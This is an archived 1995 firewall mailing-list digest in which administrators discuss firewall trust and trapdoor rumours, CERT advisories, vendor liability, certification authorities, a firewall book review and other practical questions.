This is a valid point, but I don't understand why the poster would trust the reseller any more than he/she trusts (or doesn't trust, in this case) the developer! Indeed, for the truly concerned, even source code availability for the customer is insufficient (the compiler may be doctored to insert a trap door).

So one can only wonder about the anonymous poster's _real_ motives:

> I'm afraid that companies may look at the Sun firewall-1 product and
> think that Sun has inspected the code for trapdoor and such in the code
> that may have put there under orders from the Masad. In fact, I heard
> one person say that in looking at the binary there is very suspicious
> code.

1. And what assurances would we have that Sun (or the NSA) wouldn't insert a trap door if they had the sources?

2. The last sentence is a bit vague, perhaps the poster would care to elaborate?

Notes: I am in no way connected with either Checkpoint (the company which wrote Firewall-1) or Sun. I am an (insulted) Israeli citizen.

-----------------------------------------------------------------
Rony Shapiro           | Phone : 972-3-6459556
RADGuard Ltd.          | Fax   : 972-3-6480859
8, Hanechoshet St.     | E-mail: ronys@radguard.co.il
Tel Aviv 69710 Israel

From firewalls-owner Sun Sep 10 04:00:09 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA04281 for firewalls-outgoing; Sun, 10 Sep 1995 03:54:49 -0700
Received: from boombox.cyber.com.au (boombox.cyber.com.au [203.7.155.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA04273; Sun, 10 Sep 1995 03:54:38 -0700
Received: (from root@localhost) by boombox.cyber.com.au (8.6.8/8.6.6) with UUCP id UAA32223; Sun, 10 Sep 1995 20:53:07 +1000
Received: (from mikec@localhost) by phyto.cyber.com.au (8.6.9/8.6.9) id UAA02903; Sun, 10 Sep 1995 20:16:37 +1000
From: Mike Ciavarella
Message-Id: <199509101016.UAA02903@phyto.cyber.com.au>
Subject: Re: Interpreting CERT advisories
To: Brent@greatcircle.com (Brent Chapman)
Date: Sun, 10 Sep 1995 20:16:36 +1000 (EST)
Cc: bdboyle@maverick.erenj.com, firewalls@greatcircle.com
In-Reply-To: from "Brent Chapman" at Sep 8, 95 09:41:37 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 471
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> The fact that there are lots of CERT advisories for a given vendor
> doesn't (necessarily) mean that vendor is somehow less secure; it _does_
> means that the vendor is more willing than others to cooperate with CERT
> in producing advisories (which I think is a feature, not a bug).

It's also a (very rough) indicator of the types of machines ppl have (and have access to). How many advisories or potential holes have been reported on net-connected MVS boxen?
Mike

From firewalls-owner Sun Sep 10 11:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08498 for firewalls-outgoing; Sun, 10 Sep 1995 11:24:51 -0700
Received: from pony-express.ims.advantis.com (pony-express.ims.advantis.com [165.87.194.144]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA08491 for ; Sun, 10 Sep 1995 11:24:47 -0700
Received: by pony-express.ims.advantis.com (5.67b/4.03) id AA21529; Sun, 10 Sep 1995 14:19:20 -0400
Received: from pangloss.ims.advantis.com(164.120.180.21) by pony-express.ims.advantis.com via smap (V1.3) id sma019222; Sun Sep 10 14:19:14 1995
Received: by pangloss.ims.advantis.com (AIX 3.2/UCB 5.64/4.03) id AA28764; Sun, 10 Sep 1995 14:23:15 -0400
Message-Id: <9509101823.AA28764@pangloss.ims.advantis.com>
Subject: Re: mirrored fw
To: ee@mailhost.hooked.net (Eric Eigenfeld)
Date: Sun, 10 Sep 1995 14:23:14 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199509082145.OAA02362@chum.hooked.net> from "Eric Eigenfeld" at Sep 8, 95 02:45:06 pm
From: chk@psa.pencom.com (Christian Kuhtz)
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Content-Length: 1522
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I am developing plans for a mirrored fw architecture. The client requires
> 2--->n locations, each with its own independently operating, complete
> architectures that could assume control on demand. User base is quite
> large, and firewalls are already implemented and functioning in multiple
> locations.
>
> Throw in automatic mirroring of changes to internal and external web
> servers, a left handed monkey wrench for adjustments, and they're happy.
>
> Any experiences with mirrored firewalls?

SUP for instance is a very nice tool for remote deployment. Basically anything that can do remote deployment with strong authentication should do the trick. But you probably not only need remote deployment, but also remote execution. SSH might do the trick for that part; then again, you might as well use SSH's rcp for remote deployment with SSH's rsh for remote execution. Or, you could completely kerberize your firewalls. Lotsa options. Almost anything will do.

What exactly do the web servers have to do with your firewall management?... Maybe a little bit more explanation of what you were trying to accomplish in what kind of setup would be a great idea. :) And why are you mirroring them, for redundancy only or increased performance?

Best Regards,
Chris

--
 ___ ____ __
| _ \/ __/| \    Christian Kuhtz                           (914) 684-4467
| _/\__ \| \ \   Pencom System Administration Services  fax: (914) 684-3791
|_| /___/|_|__\  on-location at Advantis/IBM Global Network, White Plains, NY

From firewalls-owner Sun Sep 10 12:32:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA09360 for firewalls-outgoing; Sun, 10 Sep 1995 12:13:37 -0700
Received: from pony-express.ims.advantis.com (pony-express.ims.advantis.com [165.87.194.144]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA09353 for ; Sun, 10 Sep 1995 12:13:34 -0700
Received: by pony-express.ims.advantis.com (5.67b/4.03) id AA21127; Sun, 10 Sep 1995 15:08:09 -0400
Received: from pangloss.ims.advantis.com(164.120.180.21) by pony-express.ims.advantis.com via smap (V1.3) id sma016517; Sun Sep 10 15:08:06 1995
Received: by pangloss.ims.advantis.com (AIX 3.2/UCB 5.64/4.03) id AA27573; Sun, 10 Sep 1995 15:12:07 -0400
Message-Id: <9509101912.AA27573@pangloss.ims.advantis.com>
Subject: Re: Firewall-1 concerns
To: silveira@nutecpa.nutec.tche.br
Date: Sun, 10 Sep 1995 15:12:06 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9509081844.aa27730@canario.canario.nutecsp.br> from "silveira@nutecpa.nutec.tche.br" at Sep 8, 95 06:46:08 pm
From: chk@psa.pencom.com (Christian Kuhtz)
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Content-Length: 2445
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Finally, on a broader issue, a question from me: How are contracts signed
> between the firewall provider and the customer with regard to the possibility
> of a successful attack?

Most companies are smart enough to disclaim all their responsibility for any kind of damages anyways. How much that'll hold water in a court of law is another question, especially with the general lack of competence in this field as far as the manifestations of justice are concerned.

Usually, there's little hope that you can hold anybody liable, unless you can prove that they've implemented a certain shortcoming with intent, which in turn is (obviously) very difficult, if not impossible. Like, zzz sells company xxx a firewall product, takes over support and management of it with the intent to break into xxx's critical systems (a complete technical and social trojan so to speak :). That you can probably take to court with a reasonable chance of succeeding in holding zzz responsible, assuming your contract does not disclaim liability and you can prove everything == *VERY* unlikely to happen.

Otherwise, forget it. You can at the most fire your *own* employee, and potentially you can take the person to court. You're free to attempt holding anyone liable for anything (which is fortunately what many people try to do in the US and unfortunately, IMHO, way too many succeed in doing so), but I doubt you'll yield anything but lotsa attorney costs.

Lastly, imagine international law becoming a part of this. Let's say, your box is in Russia, your alleged hacker pool is somewhere in the US, and your firewall manufacturer is Brazilian.. there's realistically speaking no way you're gonna catch anyone or hold anybody responsible. Unless you deal with something touching national security.... but to those kinds of things, the laws of gravity don't apply anyways.

Anyways, I have yet to see a contract where the contractor signs over full responsibility for a firewall etc. Too many things have influence on security, such as internal policies, building security etc. There is usually not much of a contract safety-net, in my experience, many rely on the reputation alone.

Best Regards,
Chris

--
 ___ ____ __
| _ \/ __/| \    Christian Kuhtz                           (914) 684-4467
| _/\__ \| \ \   Pencom System Administration Services  fax: (914) 684-3791
|_| /___/|_|__\  on-location at Advantis/IBM Global Network, White Plains, NY

From firewalls-owner Sun Sep 10 14:30:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA11507 for firewalls-outgoing; Sun, 10 Sep 1995 14:16:06 -0700
Received: from delfin.com (delfin.com [192.129.85.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA11500 for ; Sun, 10 Sep 1995 14:16:03 -0700
Received: from delfinsd.delfinsd.delfin.com ([192.187.198.1]) by delfin.com (4.1/SMI-4.1 - 6/21/93 ) id AA14944; Sun, 10 Sep 95 14:11:05 PDT
Received: from felixpc (felixpc.delfinsd.delfin.com) by delfinsd.delfinsd.delfin.com (4.1/SMI-4.1) id AA03684; Sun, 10 Sep 95 14:15:49 PDT
Message-Id: <9509102115.AA03684@delfinsd.delfinsd.delfin.com>
X-Sender: felix@delfinsd-gw
X-Mailer: Windows Eudora Version 2.1.1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 10 Sep 1995 14:13:55 -0700
To: Firewalls@greatcircle.com
From: Robin Felix
Subject: Re: upgrade to commercial firewalls
Cc: Shawn Steele
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:24 PM 9/8/95 -0600, Shawn Steele wrote:
>> If we get attacked and lose software/data etc, then
>> who's liable ?
>> If we use freeware products, then no one is. If we use a commercial
>> product, then we can, I guess, sue the firewall supplier ... ?
>
>Ah, sue-happy America. I seriously doubt you'll find a supplier that
>doesn't have some sort of clause specifically disallowing any damages
>from using their product. (A friend recently had his house broken
>into, I doubt he could successfully sue the deadbolt manufacturer).

It's not the suit that's important -- it's who is responsible for "making you whole" after a loss that's the major concern. The suit is a last resort, but the knowledge (or best guess) concerning who would win the suit is the ammunition you bring to negotiation. The deadbolt manufacturer above could probably be "persuaded" to help make you whole if the deadbolt did not perform as advertised or were defective in some way, as a suit would be more costly for them than paying your damages.

Likewise, any disclaimer on a commercial firewall is only good insofar as it disclaims responsibility for loss if installed and properly configured and maintained. If the product has a serious defect that allowed you to be damaged despite its proper installation and maintenance, then that firewall manufacturer could face liability despite any words to the contrary on the package.

I imagine that the original writer has business loss insurance. I'd look closely at the policy to see how that insurance, generally designed for physical loss, handles data loss. If that type of coverage is excluded and you're using a homegrown or public domain firewall you're on your own, having only the destroyer to find and "convince" to make you whole, a difficult task. If you're using a commercial firewall and the loss occurred through a defect, the firewall company could face liability despite disclaimers.

If your loss is covered by your insurance, on the other hand, then the insurance company (which should be calculating its premiums based on your particular site's security plan and practices) would make you whole, then go forth to get restitution from appropriate persons who could include the destroyer and the commercial firewall vendor if the product did not perform to spec. It's really their choice -- you only have to worry about collecting payment from the insurance company by convincing them that you were implementing security in a reasonable fashion, or a fashion required by your particular insurance policy.

Using a commercial product may or may not give you someone to go after depending on the circumstances, but if you're hanging out without insurance it probably would give you more options than if you build the firewall yourself.

BTW, while it's true that damage from data loss is a serious concern, regular backups to inaccessible offline storage should minimize that damage to the data lost since the last backup. You are doing that, aren't you? ;-)

--
Robin Felix; felix@delfin.com; felix@nosc.mil
619-291-2194(work), 619-291-5852(fax), 619-991-5081(alt)
http://www.delfinsd.delfin.com/

From firewalls-owner Sun Sep 10 16:30:26 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA13828 for firewalls-outgoing; Sun, 10 Sep 1995 16:01:32 -0700
Received: from MUKLUK.HQ.DECUS.CA ([198.53.154.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA00133 for ; Sat, 9 Sep 1995 21:57:42 -0700
Received: by mukluk.hq.decus.ca (MX V3.3 VAX) id 14783; Sun, 10 Sep 1995 00:33:39 EST
Date: Sun, 10 Sep 1995 00:29:26 EST
From: "Rob Slade, the doting grandpa of Ryan Hoff"
X-Comment: To: header was truncated; missing 2 entries.
To: kaisaki@csmc.edu, cccf@email.teaser.com, orvis@llnl.gov, jhammock@clark.net, vcrouch@wic.ca, gen@stubbs.ucop.edu, pitzel@cs.sfu.ca, eccles@freenet.vancouver.bc.ca, myles@io.org, kms@northcoast.net, jb@paris7.jussieu.fr, vclib@uts.cc.utexas.edu, kehoe@fortuity.com, lloyd_uliana@mindlink.net, temetz@carleton.edu, susan@cyberstore.ca, mae@freenet.victoria.bc.ca, pd@nwavbbs.demon.co.uk, jon@stekt.oulu.fi, swanson@csmes.ncsl.nist.gov, wells@csmes.ncsl.nist.gov, pfratus@compubooks.com, reviews@reiters.com, rjames@fox.nstn.ns.ca, roswell@fox.nstn.ca, ecbs@sas.ab.ca, sanj@wordsworth.com, afinet@books.com, jkcohen@uci.edu, keithx@technical.powells.portland.or.us, michel.bauwens@dm.rs.ch, pandres@cln.etc.bc.ca, root@mag.mechnet.com, clovf@ruby.ils.unc.edu, shrike@shell.portal.com, rob.slade@f733.n153.z1.fidonet.org, steele@wolfe.net, cnews@libtech.com, johnl@mukluk.hq.decus.ca, mulholland@psc.org, robertbl@mukluk.hq.decus.ca, swart@shr.dec.com, elizabethm@mukluk.hq.decus.ca
CC: brock@ucsub.colorado.edu, book-reviews@news.colorado.edu, misc-books-technical@cs.utexas.edu, alt-books-technical@cs.utexas.edu, biz-books-technical@cs.utexas.edu, risks@csl.sri.com, firewalls@greatcircle.com, comp-security-misc@cs.utexas.edu, techs@ulysses.sis.ualberta.ca, secsig-l@decus.ca, roberts@mukluk.hq.decus.ca
X-VMSmail-To: @REVIEW
X-VMSmail-CC: @BOKLSTRV,MX%"risks@csl.sri.com",MX%"firewalls@greatcircle.com",MX%"comp-security-misc@cs.utexas.edu",MX%"techs@ulysses.sis.ualberta.ca",MX%"secsig-l@decus.ca",ROBERTS
Message-ID: <0099629C.F44652C0.14783@mukluk.hq.decus.ca>
Subject: "Building Internet Firewalls" by Chapman/Zwicky
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[I received a draft copy of this, so some details either aren't available or might have changed. Last word I had from the publisher, this is due for release on Tuesday - rms]

BKBUINFI.RVW 950712

"Building Internet Firewalls", Chapman/Zwicky, 1995, 1-56592-124-0
%A Brent Chapman
%A Elizabeth Zwicky
%C 103 Morris Street, Suite A, Sebastopol, CA 95472
%D 1995
%G 1-56592-124-0
%I O'Reilly & Associates, Inc.
%O 800-998-9938 707-829-0515 fax: 707-829-0104 nuts@ora.com
%O 519-283-6332 800-528-9994 rick.brown@onlinesys.com
%T "Building Internet Firewalls"

Cheswick and Bellovin's "Firewalls and Internet Security" (cf. BKFRINSC.RVW) will continue to be seen as the classic reference with the seriously technical crowd. Chapman and Zwicky, however, have here created the first reference for the more normal run of system administrators: those whose lives do not revolve around hacking the UNIX kernel.

Part one could almost stand as a separate book, itself. It is an introduction to firewalls. More, it is a very down-to-earth and practical guide to evaluating security needs and planning for security systems and practices. The writing is completely clear, and the explanations first-rate. Chapter four, on firewall architectures, is a perfect introduction for the manager who, while not having a technical background, must lead or administer a security project.

Part two gets into more technical details of firewall construction and the communications needs for Internet services. The writing, though, is still clear and easily accessible to any intelligent reader.

Part three covers maintenance and administrative work. Appendices list information and software resources as well as a brief introduction to TCP/IP basics.

This is the first book which truly explains, to the non-specialist, the various factors and functions involved in firewall choice and construction. For those building their own and for those evaluating vendor proposals, this book is a must.

copyright Robert M. Slade, 1995   BKBUINFI.RVW 950712

=============
Vancouver      ROBERTS@decus.ca                 | "The client interface
Institute for  Robert_Slade@sfu.ca              | is the boundary of
Research into  Rob_Slade@mindlink.bc.ca         | trustworthiness."
User           rslade@freenet.vancouver.bc.ca   |   - Tony Buckland, UBC
Security       Canada V7K 2G6                   |

From firewalls-owner Sun Sep 10 18:00:22 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16354 for firewalls-outgoing; Sun, 10 Sep 1995 17:33:09 -0700
Received: from state-opera.comp.vuw.ac.nz (state-opera.comp.vuw.ac.nz [130.195.5.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA16340 for ; Sun, 10 Sep 1995 17:33:03 -0700
X400-Received: by mta state-opera.comp.vuw.ac.nz in /PRMD=NewZnet/ADMD=Synet/C=NZ/; Relayed; Mon, 11 Sep 1995 12:19:51 +1200
X400-Received: by /PRMD=Postie/ADMD=Synet/C=NZ/; Relayed; Mon, 11 Sep 1995 12:07:22 +1200
X400-Received: by /PRMD=NewZnet/ADMD=Synet/C=NZ/; Relayed; Mon, 11 Sep 1995 12:05:18 +1200
X400-Received: by /PRMD=NewZnet/ADMD=Synet/C=NZ/; Relayed; Sun, 10 Sep 1995 17:29:26 +1200
Date: Sun, 10 Sep 1995 17:29:26 +1200
X400-Originator: firewalls-owner@GreatCircle.COM
X400-Recipients: non-disclosure:;
X400-MTS-Identifier: [/PRMD=NewZnet/ADMD=Synet/C=NZ/;<0099629C.F44652C0.14783@mukluk.]
X400-Content-Type: P2-1984 (2)
Content-Identifier: (l)l(r)q(l)r(r)B
Alternate-Recipient: Allowed
From: a
Message-ID: <0099629C.F44652C0.14783@mukluk.hq.decus.ca>
To: tolist@postie.synet.net.nz, cclist@postie.synet.net.nz
Subject: "Building Internet Firewalls" by Chapman/Zwicky
X-Comment: To: header was truncated; missing 2 entries.
X-VMSmail-To: @REVIEW
X-VMSmail-CC: @BOKLSTRV,MX%"risks@csl.sri.com",MX%"firewalls@greatcircle.com",MX%"comp-security-misc@cs.utexas.edu",MX%"techs@ulysses.sis.ualberta.ca",MX%"secsig-l@decus.ca",ROBERTS
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From firewalls-owner Mon Sep 11 00:30:26 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22177 for firewalls-outgoing; Mon, 11 Sep 1995 00:20:42 -0700
Received: from gatekeep.genmagic.com (gatekeep.genmagic.com [192.216.16.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA22168; Mon, 11 Sep 1995 00:20:38 -0700
Received: from (genmagic.genmagic.com [10.1.4.12]) by gatekeep.genmagic.com (8.6.9/8.6.9) with SMTP id QAA16163; Sun, 10 Sep 1995 16:04:05 -0700
Received: from abulafia.genmagic.com by genmagic (4.1/SMI-4.1/JBS) id AA01462; Mon, 11 Sep 95 00:10:18 PDT
Received: by abulafia.genmagic.com (931110.SGI/930416.SGI) for @genmagic.genmagic.com:Brent@GreatCircle.COM id AA14024; Mon, 11 Sep 95 00:10:29 -0700
Date: Mon, 11 Sep 95 00:10:29 -0700
From: jet@abulafia.genmagic.com (J. Eric Townsend)
Message-Id: <9509110710.AA14024@abulafia.genmagic.com>
To: Mike Ciavarella
Cc: Brent@GreatCircle.COM (Brent Chapman), bdboyle@maverick.erenj.com, firewalls@GreatCircle.COM
Subject: Re: Interpreting CERT advisories
In-Reply-To: <199509101016.UAA02903@phyto.cyber.com.au>
References: <199509101016.UAA02903@phyto.cyber.com.au>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

"mikec" == Mike Ciavarella writes:

mikec> It's also a (very rough) indicator of the types of machines ppl
mikec> have (and have access to). How many advisories or potential
mikec> holes have been reported on net-connected MVS boxen?

How many MVS systems are plugged directly into the internet? How many are actually used for TCP/IP related services? (Where's my Mosaic for MVS? :-)

IMHO, Suns get broken into all the time because:

-- everybody has one to practice on
-- they were designed with being useful in mind.

--jet

From firewalls-owner Mon Sep 11 01:00:19 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22327 for firewalls-outgoing; Mon, 11 Sep 1995 00:43:41 -0700
Received: from warrane.connect.com.au (warrane.connect.com.au [192.189.54.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA22320 for ; Mon, 11 Sep 1995 00:43:37 -0700
Received: from mailgate.UUCP (root@localhost) by warrane.connect.com.au with UUCP id RAA01674 (8.6.12/IDA-1.6 for GreatCircle.COM!Firewalls); Mon, 11 Sep 1995 17:41:35 +1000
Message-Id:
Date: Mon, 11 Sep 95 16:36 EST
X-Sender: schan@dev
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Firewalls@GreatCircle.COM
From: Stanley Chan
Subject: Re: Firewalls-Digest V4 #518
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>1. It's Mosad and not Masad
>2. I wish someone would tell me about all those conspiracies I'm supposed
>   to be a part of.
>3. The question here is a legit one, how can you trust a firewall when
>   you don't know what the code looks like?
>4. Posting from an anon account won't stop the Masad from finding you,
>   and now that you've blown their cover, I guess they'll have to kill you.
>

Well, I think if we have to worry about a firewall's source code, I would spend my time worrying about all the kernel problems instead. How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who wrote a UNIX OS for sale and yet never ever reviews their source code to you for certification? Maybe you can argue that the US Defense have looked at it. But how can people from outside the US trust it? How do we know that the code did not include a backdoor to let someone in secretly or download your secret documents in the system to a distant machine?
Stanley Chan (System Administrator)
E-mail schan@gcau.com.au (Ph 617-38771016 Fax 617-38771120)
Snail Golden Casket Art Union Office
Locked bag 7, Coorparoo DC Qld Australia 4151

From firewalls-owner Mon Sep 11 05:32:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA26618 for firewalls-outgoing; Mon, 11 Sep 1995 05:13:15 -0700
Received: from bn.com ([161.221.10.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA26611 for ; Mon, 11 Sep 1995 05:13:13 -0700
Received: from mhs-gw.bn.com by bn.com (5.0/SMI-SVR4) id AA00600; Mon, 11 Sep 1995 08:11:26 +0500
Message-Id: <9509111211.AA00600@bn.com>
From: VMIRAGLI@bn.com (Vincent Miragliotta)
Date: Mon, 11 Sep 1995 08:04 EST
To: firewalls@greatcircle.com
Subject: Subscription
content-length: 79
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm not receiving any more mail from the Firewall Forum. Was I de-subscribed?

From firewalls-owner Mon Sep 11 05:37:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA26880 for firewalls-outgoing; Mon, 11 Sep 1995 05:28:41 -0700
Received: from zeus.danosi.dk (zeus.danosi.dk [193.88.50.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA26873 for ; Mon, 11 Sep 1995 05:28:33 -0700
Received: from notesgw.danosi.dk by zeus.danosi.dk (4.1/SMI-4.1) id AA06004; Mon, 11 Sep 95 14:25:40 +0200
Received: by notesgw.danosi.dk (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA0077; Mon, 11 Sep 95 14:29:36 +0100
Message-Id: <9509111329.AA0077@notesgw.danosi.dk>
Received: from DANOSI with "Lotus Notes Mail Gateway for SMTP" id 163E8F913BCEB771C125623400438A56; Mon, 11 Sep 95 14:29:35
To: firewalls
From: Carsten Rhod Gregersen/DANOSI_Aarhus/DK
Date: 11 Sep 95 14:23:26
Subject: Email guards
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am looking for email guards, something like the TIS-TMEG email guard as a filter to sendmail or similar mail server programs (look at their www page for more info www.tis.com). Is TIS the only manufacturer of such software ??? (I've spent quite some time surfing around, with no results)

Regards
Carsten Rhod Gregersen

From firewalls-owner Mon Sep 11 06:30:43 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA28167 for firewalls-outgoing; Mon, 11 Sep 1995 06:28:40 -0700
Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA28159 for ; Mon, 11 Sep 1995 06:28:34 -0700
Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id XAA14374 (8.6.12/IDA-1.6 for ); Mon, 11 Sep 1995 23:27:09 +1000
Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA12886 for firewalls@greatcircle.com; Mon, 11 Sep 1995 23:27:01 +1000
Date: Mon, 11 Sep 1995 23:27:01 +1000
From: Julian Assange
Message-Id: <199509111327.XAA12886@suburbia.net>
To: firewalls@greatcircle.com
Subject: wank worm
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I know this is off target, but what the heck. I am trying to locate specific information that was used in the Wank Worm circa mid 1989. In particular I am trying to locate the fortune cookie file that was included in it. I believe the fortunes were pulled from the bsd fortune program. That said, finding which versions of fortune were extant during that period and then finding an existing copy of that version now has become a little trying. If anyone on this list had personal experience with the worm at the time or can point me to ancient versions of fortune (oldest I could locate was bsd42/tahoe/reno) I'd certainly appreciate it.
-Julian Assange (proff@suburbia.net) From firewalls-owner Mon Sep 11 06:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA27747 for firewalls-outgoing; Mon, 11 Sep 1995 06:07:00 -0700 Received: from OAG.STATE.TX.US (smtpgate.oag.state.tx.us [204.64.38.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA27740 for ; Mon, 11 Sep 1995 06:06:57 -0700 Received: from OCS-Message_Server by OAG.STATE.TX.US with Novell_GroupWise; Mon, 11 Sep 1995 08:10:15 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 11 Sep 1995 08:04:53 -0600 From: Richard Owen To: firewalls@greatcircle.com Subject: BOS: firewall certification authority -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I agree with this concern. The National Research Council issued a report on sensitive but unclassified computing in the US entitled "Computers at Risk." In that report they suggested that an independent organization be formed, the Information Security Foundation. We are about a talking non-government organization under the direction and review of industry and the information security profession {of course with an interface to government). It is hoped that this organization would be given the authority to reduce export restrictions. As President of ISSA, I am very interested in seeing this happen. I have even proposed that ISSA would help to establish such an organization. IMPORTANT POINT: The ISF (now IISF) would not be part of ISSA. It is bigger than ISSA or any organization. The IISF needs to not only provide certification (firewalls, systems, people, etc.) and testing but standards development and research. ISSA currently has a committee that is trying to define the Generally Accepted System Security Principles (GSSP) as also called for in the Computers at Risk report. The IISF should be a place to pull all of our activities into a unified direction. 
This is what I have proposed to a working group of the President's National Security & Telecommunications Advisory Council.

>>> Marcus J. Ranum 09/08/95 10:32pm >>>
> OK folks, imagine there was to be a firewall certification authority. Who
> would you want them to be? Who do you trust?

First ask if there should be one at all. Not all firewalls are the same; many have very different design goals and objectives. For a single authority to certify a firewall will imply a single authority imposing its idea of "correct design": a role NSA has adopted in the past with varying levels of success and questionable benefits to the community.

From firewalls-owner Mon Sep 11 07:00:36 1995
From: Shane Kinsch
To: Firewall
Subject: httpd compilation
Date: Mon, 11 Sep 95 08:27:57 CDT

We have another UNIX box that we're trying to denote as our web server, and I guess my question is: has anyone out there been able to compile CERN's httpd for Interactive UNIX SysV Rel3.2 V3.01? Just curious, because I need help!

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
_/  Shane T Kinsch          BRITE VOICE SYSTEMS, INC.   _/
_/  shane.kinsch@brite.com  UNIX TECHNICAL ENGINEER     _/
_/  Wichita, KS USA         "MIME is ok here"           _/
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

From firewalls-owner Mon Sep 11 07:36:03 1995
From: stacy@ey.ca (Stacy L. Millions)
To: dmurphy@coltrane.cwa.com
Cc: Firewalls@greatcircle.com
Subject: Re: Corporate Audits
Date: Mon, 11 Sep 1995 01:57:31 GMT
Message-Id: <9509110219.AA17961@server-001.ey.ca>
Reply-To: stacy@ey.ca

On Fri, 8 Sep 95 14:48:20 -0400, you wrote:
> Gentlebeings,
> Better yet, does anybody work for
> one of the Used-To-Be-Big-7 accounting firms and know what they're doing
> internally about this?

Well, I could tell you; but then I would have to kill you :-)

Sorry, couldn't resist. Seriously, don't you think it would be of questionable ethics to discuss internal security policy for one of the 'Big-7' (or six or eight or however many after the last round of mergers, acquisitions and split ups :-). If we audited your books, would you like us discussing such matters? Or more appropriately, "if you could afford the lawyers that some of our clients can afford and we audited your books ...." :-) I think you get the point.

On the other hand, it would make a great series for 'Dilbert', wouldn't it?
-stacy

From firewalls-owner Mon Sep 11 07:43:40 1995
From: Rick Smith
To: mjr@iwi.com
Cc: firewalls@greatcircle.com, rpower@mfi.com
Subject: Re: BOS: firewall certification authority
Date: Mon, 11 Sep 1995 09:24:30 -0500 (CDT)
Message-Id: <199509111424.JAA21560@shade.sctc.com>
In-Reply-To: <199509090432.AAA15521@switchblade.iwi.com> from "Marcus J. Ranum" at Sep 9, 95 00:32:57 am

Would it be worthwhile for us to consider how well/poorly various models of "certification" have worked in other industries or disciplines?

I agree that the "Underwriters Laboratories" model won't work for computer devices, regardless if you're certifying "security" or "reliability" or some other global property. Computer based devices are just too complex compared with UL's typical device to test.

Right now there's more of a "building inspector" flavor to computer security implementation.
Somebody puts in a firewall (using better or worse techniques, experience, assumptions) and somebody else comes along and reviews it. The reviewer checks off compliance with building codes: a particular building may wildly exceed codes or, more often, will pass with perhaps a few things that must be changed. However, the building inspectors have a written set of standards to apply (for better or worse) while firewall analysts (or whatever the title is) simply apply some undefined intuition and wrap it in convincing prose. Or worse, they run some canned procedure and document the results.

I have only a superficial understanding of FDA rules for approving drugs, but it almost sounds like a similar problem. The interaction of drug and human body is supposed to be analyzed and quantified based on statistical "trials" as well as formal arguments regarding the drug's design and the drug company's procedures for developing such things. There's no expectation that a given drug will work for any patient. The riskier ones are administered under the watchful eye of a trained professional with periodic followup. But the resulting procedure is obscenely expensive and time consuming. Not too different from NCSC formal evaluations, actually.

I don't believe we can specify a perfect solution for the problem. Can we specify something (anything?) that's better than nothing and produces the least amount of pain and misdirection on both the industry and our customers?

Rick.
